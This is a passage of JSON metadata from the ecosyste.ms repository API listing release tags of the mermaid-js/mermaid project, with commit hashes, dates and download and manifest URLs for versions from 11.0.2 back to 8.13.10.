s.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"